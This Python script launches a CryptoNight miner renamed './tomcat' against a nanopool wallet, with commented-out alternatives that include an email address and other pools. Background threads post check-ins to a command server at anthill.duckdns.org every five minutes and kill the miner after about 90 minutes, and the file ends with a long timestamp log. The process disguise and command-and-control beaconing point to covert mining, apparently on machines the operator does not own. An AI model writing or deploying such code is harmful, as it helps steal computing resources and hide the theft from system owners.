import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:58:01.340404
#2018-02-17 16:45:03.745587
#2018-02-17 18:32:07.045962
#2018-02-17 20:20:06.860458
#2018-02-17 22:07:07.136242
#2018-02-17 23:51:01.294333
#2018-02-18 01:41:01.763375
#2018-02-18 03:28:05.659960
#2018-02-18 05:16:06.659259
#2018-02-18 07:08:04.151070
#2018-02-18 08:56:06.184244
#2018-02-18 10:43:05.868726
#2018-02-18 12:28:05.317194
#2018-02-18 14:16:03.887920
#2018-02-18 16:06:04.562378
#2018-02-18 17:54:07.578616
#2018-02-18 19:41:04.928945
#2018-02-18 21:26:04.868144
#2018-02-18 23:15:08.820027
#2018-02-19 01:03:04.210760
#2018-02-19 02:50:09.194763
#2018-02-19 04:37:06.248613
#2018-02-19 06:21:03.911825
#2018-02-19 08:09:01.687286
#2018-02-19 09:59:02.131690
#2018-02-19 11:48:01.498616
#2018-02-19 13:33:02.212959
#2018-02-19 15:21:04.949569
#2018-02-19 17:08:10.785087
#2018-02-19 18:56:07.711403
#2018-02-19 20:43:04.554382
#2018-02-19 22:29:07.602749
#2018-02-20 00:15:09.582189
#2018-02-20 02:04:01.771428
#2018-02-20 03:54:01.330485
#2018-02-20 05:38:01.738317
#2018-02-20 07:23:04.909215
#2018-02-20 09:08:07.589789
#2018-02-20 10:51:03.816389
#2018-02-20 12:38:02.186854
#2018-02-20 14:24:09.406508
#2018-02-20 16:08:04.351017
#2018-02-20 17:54:04.247913
#2018-02-20 19:45:08.923898
#2018-02-20 21:34:01.397257
#2018-02-20 23:17:01.842468
#2018-02-21 01:00:02.330835
#2018-02-21 02:48:04.708198
#2018-02-21 04:32:06.465534
#2018-02-21 06:19:05.198199
#2018-02-21 08:05:02.744926
#2018-02-21 09:51:01.391563
#2018-02-21 11:39:08.297732
#2018-02-21 13:27:06.497056
#2018-02-21 15:11:08.065732
#2018-02-21 17:03:01.946124
#2018-02-21 18:50:13.590392
#2018-02-21 20:40:09.072596
#2018-02-21 22:26:05.557216
#2018-02-22 00:16:08.767134
#2018-02-22 02:04:04.251128
#2018-02-22 03:50:06.157460
#2018-02-22 05:37:07.368138
#2018-02-22 07:23:01.714941
#2018-02-22 09:10:07.955034
#2018-02-22 10:58:05.983452
#2018-02-22 12:44:08.217607
#2018-02-22 14:31:06.163563
#2018-02-22 16:18:09.079954
#2018-02-22 18:04:12.586440
#2018-02-22 19:54:02.194958
#2018-02-22 21:43:04.649064
#2018-02-22 23:31:08.511689
#2018-02-23 01:19:04.259148
#2018-02-23 03:05:08.549210
#2018-02-23 04:51:04.815947
#2018-02-23 06:36:07.343672
#2018-02-23 08:24:06.678232
#2018-02-23 10:40:04.126588
#2018-02-23 12:34:10.787817
#2018-02-23 14:21:08.681240
#2018-02-23 16:12:08.763413
#2018-02-23 17:58:07.600483
#2018-02-23 19:44:05.720982
#2018-02-23 21:27:04.463732
#2018-02-23 23:14:08.221627
#2018-02-24 00:58:07.088626
#2018-02-24 02:52:07.894316
#2018-02-24 04:41:06.411326
#2018-02-24 06:25:04.750917
#2018-02-24 08:13:01.543098
#2018-02-24 09:56:06.025500
#2018-02-24 11:51:05.207915
#2018-02-24 13:43:05.039981
#2018-02-24 15:33:03.605768
#2018-02-24 17:27:05.645992
#2018-02-24 19:14:04.820717
#2018-02-24 21:01:06.472058
#2018-02-24 23:34:01.393854
#2018-02-25 03:43:07.522357
#2018-02-25 07:28:06.450419